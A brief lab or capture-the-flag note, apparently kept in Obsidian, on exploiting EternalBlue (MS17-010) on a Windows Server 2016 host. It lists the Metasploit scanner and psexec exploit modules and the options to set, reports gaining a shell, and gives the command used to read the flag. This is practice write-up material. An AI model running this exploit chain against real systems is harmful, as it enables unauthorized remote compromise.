- Windows Server 2016 Standard 6.3 - exploit EternalBlue vuln - run EternalBlue scanner - `msf6 > search eternal` ![[images/Pasted image 20251003103507.png]] - `msf6 > use scanner/smb/smb_ms17_010` - set RHOSTS - `msf6 > run` ![[images/Pasted image 20251003103449.png]] - run EternalBlue psexec exploit - `msf6 > use exploit/windows/smb/ms17_010_psexec` - set RHOSTS and LHOST - we have a shell ![[images/Pasted image 20251003103901.png]] - we have the flag; show with `type` command![[images/Pasted image 20251003104014.png]]